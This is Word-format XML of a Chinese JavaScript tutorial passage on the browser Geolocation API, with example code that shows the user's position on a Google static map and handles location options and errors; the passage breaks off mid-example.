    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>地理位置</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.w3.org/TR/geolocation-API/</w:t>
      </w:r>
      <w:r>
        <w:t>）允许</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序向浏览器询问用户真实的地理位置。识别地理位置的一些应用就可以使用它来显示地图、导航和其他一些和用户当前位置相关的信息。当然，考虑到这些信息牵涉用户的隐私，支持地理位置</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaS</w:t>
      </w:r>
      <w:r>
        <w:t>cript</w:t>
      </w:r>
      <w:r>
        <w:t>程序获取用户物理位置前总是会询问用户是否允许。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>支持地理位置</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器会定义</w:t>
      </w:r>
      <w:r>
        <w:t>navigator.geolocation</w:t>
      </w:r>
      <w:r>
        <w:t>。此属性指代一个拥有如下这三个方法的对象：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>navigator.geolocation.getCurrentPosition()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>获取用户当前位置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>navigator.geolocation.watchPosition()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>获取当前位置，同时不断地监视当前位置，一旦用户位置发生更改，就会调用指定的回调函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>navigator.geolocation.clearWatch()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>停止监视用户位置。传递给此方法的参数应当是调用</w:t>
      </w:r>
      <w:r>
        <w:t>watchPosition()</w:t>
      </w:r>
      <w:r>
        <w:t>方法获得的返回值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在包含</w:t>
      </w:r>
      <w:r>
        <w:t>GPS</w:t>
      </w:r>
      <w:r>
        <w:t>硬件的设备上，通过</w:t>
      </w:r>
      <w:r>
        <w:t>GPS</w:t>
      </w:r>
      <w:r>
        <w:t>单元可以获取精确的位置信息。不过，绝大多数情况下，位置信息都是通过</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>获取的。当浏览器提交</w:t>
      </w:r>
      <w:r>
        <w:t>Internet IP</w:t>
      </w:r>
      <w:r>
        <w:t>地址给一个</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务的时候，该服务通常能够知道（基于</w:t>
      </w:r>
      <w:r>
        <w:t>ISP</w:t>
      </w:r>
      <w:r>
        <w:t>记录）该</w:t>
      </w:r>
      <w:r>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:t>属于哪个城市（通常广告商会在服务器端这么做）。浏览器还可以通过请求操作系统获取附近无线网络的列表和它们的信号强度，来得到更加精确的位置信息。当将这些信息提交给高级的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务的时候，允许非常精确</w:t>
      </w:r>
      <w:r>
        <w:t>地计算位置（通常在一个城市范围中）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这些地理位置相关的技术都包含通过网络的数据交换或者和多个卫星之间的通信，因此地理位置</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>是异步的：</w:t>
      </w:r>
      <w:r>
        <w:t>getCurrentPosition()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>watchPosition()</w:t>
      </w:r>
      <w:r>
        <w:t>方法需要接受一个回调函数作为参数，在判断用户的位置信息（或者当位置改变信息）时，浏览器会调用该函数。如下代码展示了一个获取位置的简单例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>navigator.geolocation.getCurrentPosition(function(pos){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var latitude=pos.coord</w:t>
      </w:r>
      <w:r>
        <w:t>s.latitude;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var longitude=pos.coords.longitude;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>alert("Your position:"+latitude+","+longitude);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除了经度和纬度外，凡是成功获取到的地理位置信息还包括一个精度值（米为单位），该值表示获取到的位置信息精度是多少。</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如例</w:t>
      </w:r>
      <w:r>
        <w:t>22-1</w:t>
      </w:r>
      <w:r>
        <w:t>所示：它调用</w:t>
      </w:r>
      <w:r>
        <w:t>getCurrentPosition()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来获取当前位置，并用获取到的位置信息，在一张地图中（来自</w:t>
      </w:r>
      <w:r>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:t>地图）中显示当前位置，并且当前位置是根据位置精度进行过适当的缩</w:t>
      </w:r>
      <w:r>
        <w:t>放。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>22-1</w:t>
      </w:r>
      <w:r>
        <w:t>：通过获取地理位置信息在地图上显示当前位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个新创建的＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，该元素用于在获取到地理位置信息后，显示一张</w:t>
      </w:r>
      <w:r>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:t>地图，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>该地图上显示了当前的位置。要注意的是，此函数的调用者必须要将返回的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>插入到文档中，以使它可见</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果当前浏览器不支持地理位置</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，则抛出一个错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function getmap(){//</w:t>
      </w:r>
      <w:r>
        <w:t>检查是否支持地理位置</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">if(!navigator.geolocation)throw"Geolocation not </w:t>
      </w:r>
      <w:r>
        <w:t>supported";//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个新的＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，并开始请求地理位置信息，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//img</w:t>
      </w:r>
      <w:r>
        <w:t>元素显示包含当前位置的地图，然后再将返回该图片</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var image=document.createElement("img");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>navigator.geolocation.getCurrentPosition(setMapURL);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return image;//</w:t>
      </w:r>
      <w:r>
        <w:t>当（如果）成功获取到地理位置信息后，会在返回</w:t>
      </w:r>
      <w:r>
        <w:t>image</w:t>
      </w:r>
      <w:r>
        <w:t>对象后调用此方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">function </w:t>
      </w:r>
      <w:r>
        <w:t>setMapURL(pos){//</w:t>
      </w:r>
      <w:r>
        <w:t>从参数对象（</w:t>
      </w:r>
      <w:r>
        <w:t>pos</w:t>
      </w:r>
      <w:r>
        <w:t>）中获取位置信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var latitude=pos.coords.latitude;//</w:t>
      </w:r>
      <w:r>
        <w:t>经度</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var longitude=pos.coords.longitude;//</w:t>
      </w:r>
      <w:r>
        <w:t>纬度</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var accuracy=pos.coords.accuracy;//</w:t>
      </w:r>
      <w:r>
        <w:t>米</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>构造一个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，用于请求一张显示当前位置的静态</w:t>
      </w:r>
      <w:r>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:t>地图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var url="http://maps.google.com/maps/api/staticmap"+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"?center="+latitude</w:t>
      </w:r>
      <w:r>
        <w:t>+","+longitude+"</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>size=640x640</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>sensor=true";//</w:t>
      </w:r>
      <w:r>
        <w:t>设置一个大致的缩放级别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var zoomlevel=20;//</w:t>
      </w:r>
      <w:r>
        <w:t>以各种方式开始缩放</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(accuracy</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>80)//</w:t>
      </w:r>
      <w:r>
        <w:t>在低精度情况下进行放大</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>zoomlevel-=Math.round(Math.log(accuracy/50)/Math.LN2);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>url+="</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>zoom="+zoomlevel;//</w:t>
      </w:r>
      <w:r>
        <w:t>将缩放级别添加到</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>现在在</w:t>
      </w:r>
      <w:r>
        <w:t>image</w:t>
      </w:r>
      <w:r>
        <w:t>对象中显示该地图。感谢</w:t>
      </w:r>
      <w:r>
        <w:t>Google</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>image.src=url;</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地理位置</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>还有如下一些特性，例子</w:t>
      </w:r>
      <w:r>
        <w:t>22-1</w:t>
      </w:r>
      <w:r>
        <w:t>中没有体现：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>除了第一个回调函数的参数之外，</w:t>
      </w:r>
      <w:r>
        <w:t>getCurrentPosition()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>watchPosition()</w:t>
      </w:r>
      <w:r>
        <w:t>方法还接受第二个可选的回调函数，当获取地理位置信息失败的时候，会调用该回调函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>除了成功和失败情况下的回调函数这两个参数之外，这两个方法还接受一个配置对象作为可选的第三个参数。该对象的属性指定了是否需要高精度的位置信息，该位置信息的过期时间，以及允许系统在多长时间内获取位置信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>作为参数传递给成功情况下的回调函数的对象，还包含一个时间戳，也有可能（在某些设备上）包含诸如海拔、速度和航向之类的额外信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>22-2</w:t>
      </w:r>
      <w:r>
        <w:t>展示了如何使用这些额外的特性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>22-2</w:t>
      </w:r>
      <w:r>
        <w:t>：展示如何使用所有地理位置特性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>异步的获取我的位置，并在指定的元素中展示出来</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function whereami(elt){//</w:t>
      </w:r>
      <w:r>
        <w:t>将此对象作为第三个参数传递给</w:t>
      </w:r>
      <w:r>
        <w:t>getCurrentPosition()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var options={//</w:t>
      </w:r>
      <w:r>
        <w:t>设置为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，表示如果可以的话</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>获取高精度的位置信息（例如，通过</w:t>
      </w:r>
      <w:r>
        <w:t>GPS</w:t>
      </w:r>
      <w:r>
        <w:t>获取）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>但是，</w:t>
      </w:r>
      <w:r>
        <w:t>要注意的是，这会影响电池寿命</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>enableHighAccuracy:false,//</w:t>
      </w:r>
      <w:r>
        <w:t>可以近似：这是默认值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果获取缓存过的位置信息就足够的话，可以设置此属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>默认值为</w:t>
      </w:r>
      <w:r>
        <w:t>0,</w:t>
      </w:r>
      <w:r>
        <w:t>表示强制检查新的位置信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>maximumAge:300000,//5</w:t>
      </w:r>
      <w:r>
        <w:t>分钟左后</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>愿意等待多长时间来获取位置信息？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>默认值为无限长</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="2Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>getCurrentPosition()</w:t>
      </w:r>
      <w:r>
        <w:t>方法永不超时</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>timeout:15000//</w:t>
      </w:r>
      <w:r>
        <w:t>不要超过</w:t>
      </w:r>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:t>秒</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(navigator.geolocation)//</w:t>
      </w:r>
      <w:r>
        <w:t>如果支持的话，就获取位置信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>avigator.geolocation.getCurrentPosition(success,error,options);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elt.innerHTMl="Geolocation not supported in this browser";//</w:t>
      </w:r>
      <w:r>
        <w:t>当获取位置信息失败的时候，会调用此函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function error(e){//error</w:t>
      </w:r>
      <w:r>
        <w:t>对象包含一些数字编码和文本消息，如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//1:</w:t>
      </w:r>
      <w:r>
        <w:t>用户不允许分享他</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>她的位置信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//2:</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器无法确定位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//3:</w:t>
      </w:r>
      <w:r>
        <w:t>发生超时</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elt.innerHTML="Ge</w:t>
      </w:r>
      <w:r>
        <w:t>olocation error"+e.code+":"+e.message;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>当获取位置信息成功的时候，会调用此函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function success(pos){//</w:t>
      </w:r>
      <w:r>
        <w:t>总是可以获取如下这些字段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>但是要注意的是时间戳信息在</w:t>
      </w:r>
      <w:r>
        <w:t>outer</w:t>
      </w:r>
      <w:r>
        <w:t>对象中，而不在</w:t>
      </w:r>
      <w:r>
        <w:t>inner</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>coords</w:t>
      </w:r>
      <w:r>
        <w:t>对象中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var msg="At"+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>new Date(pos.timestamp).toLocaleString()+"you were within"+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pos.coords.accuracy+"meters of </w:t>
      </w:r>
      <w:r>
